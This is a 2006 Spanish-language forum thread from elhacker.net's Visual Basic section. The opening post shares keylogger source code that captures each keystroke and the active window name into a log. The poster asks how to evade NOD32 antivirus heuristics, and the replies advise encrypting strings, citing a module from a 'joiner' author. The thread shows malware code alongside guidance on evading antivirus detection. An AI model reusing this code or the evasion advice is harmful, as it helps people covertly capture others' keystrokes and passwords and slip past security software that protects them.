Foro de elhacker.net

Programación => Programación Visual Basic => Mensaje iniciado por: A2Corp en 29 Julio 2006, 07:23 am


Título: Heuristica del NOD
Publicado por: A2Corp en 29 Julio 2006, 07:23 am
Hola... Postie algo parecido en Troyanos y Virus, pero aqui lo hare mas centrado en esta funcion...

Necesito que me confirmen....
Si en un Modulo tengo estas 2 funciones:

Código:
Public Function FireEvent(ByVal intKey As Integer, ByVal strKeyName As String, ByVal bIsFunctionKey As Boolean, ByVal strInApplication As String)
    On Error Resume Next
    
    If strInApplication = strLastApplication Then
      Tecla_Presionada intKey, strKeyName, bIsFunctionKey, strInApplication, False
      
   Else
      Tecla_Presionada intKey, strKeyName, bIsFunctionKey, strInApplication, True
      strLastApplication = strInApplication
   End If
   
End Function

Código:
Public Function Tecla_Presionada(ByVal intKey As Integer, ByVal strKeyName As String, ByVal bIsFunctionKey As Boolean, ByVal strInApplication As String, ByVal vCambio_De_Aplicacion As Boolean)
        If vCambio_De_Aplicacion Then
        If Not FMain.txt.Text = "" Then
            FMain.txt.Text = FMain.txt.Text & vbNewLine & vbNewLine
        End If
        FMain.txt.Text = FMain.txt.Text & "<hr><b>...:::." & Now & ":::...<br>" & strInApplication & "</b><hr><br>" & vbNewLine
        If bIsFunctionKey Then
            FMain.txt.Text = FMain.txt.Text & strKeyName
        Else
            FMain.txt.Text = FMain.txt.Text & Chr(intKey)
        End If
    Else
        If bIsFunctionKey Then
            FMain.txt.Text = FMain.txt.Text & strKeyName
        Else
            FMain.txt.Text = FMain.txt.Text & Chr(intKey)
        End If
   End If

End Function

Es detectada por la heuristica?

Se puede lograr meter alguna funcion dentro de otra? no verdad?  :huh:

Esto ya me tiene desesperado, no logro burlar la heuristica del NOD!

Se que el problema esta ahi porque si quito alguna parte del code ya no es detectado el EXE pero queda inservible xD
Alguna recomendacion?
Saludos

Título: Re: Heuristica del NOD
Publicado por: Krnl64 en 29 Julio 2006, 17:20 pm
No es esactamente meter una funcion dentro de otra, sino llamar a ejecucion desde una funcion A a otra funcion B.

Porsupuesto  que se puede hacer.

En cuanto como se puede hacer indetectable, en el foro de troyanos y virus creo que te podran orientar mejor.

Una recomendacion, usa strings cifrados

Salu2

Título: Re: Heuristica del NOD
Publicado por: _Sergi_ en 29 Julio 2006, 17:44 pm
Sobre las strings cifradas, hay un post de Kizar, el del Astaroth Joiner que tiene un módulo con el algoritmo de Huffman.

Un saludo

Título: Re: Heuristica del NOD
Publicado por: Gorky en 31 Julio 2006, 20:00 pm
Hace no mucho repondi esto mismo en otro post. Supongo que ahi podras informarte.

http://foro.elhacker.net/index.php/topic,126647.msg579870.html#msg579870

Título: Re: Heuristica del NOD
Publicado por: - n0sEcReT - en 31 Julio 2006, 22:47 pm
http://foro.elhacker.net/index.php/topic,129096.msg604114.html#msg604114


Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines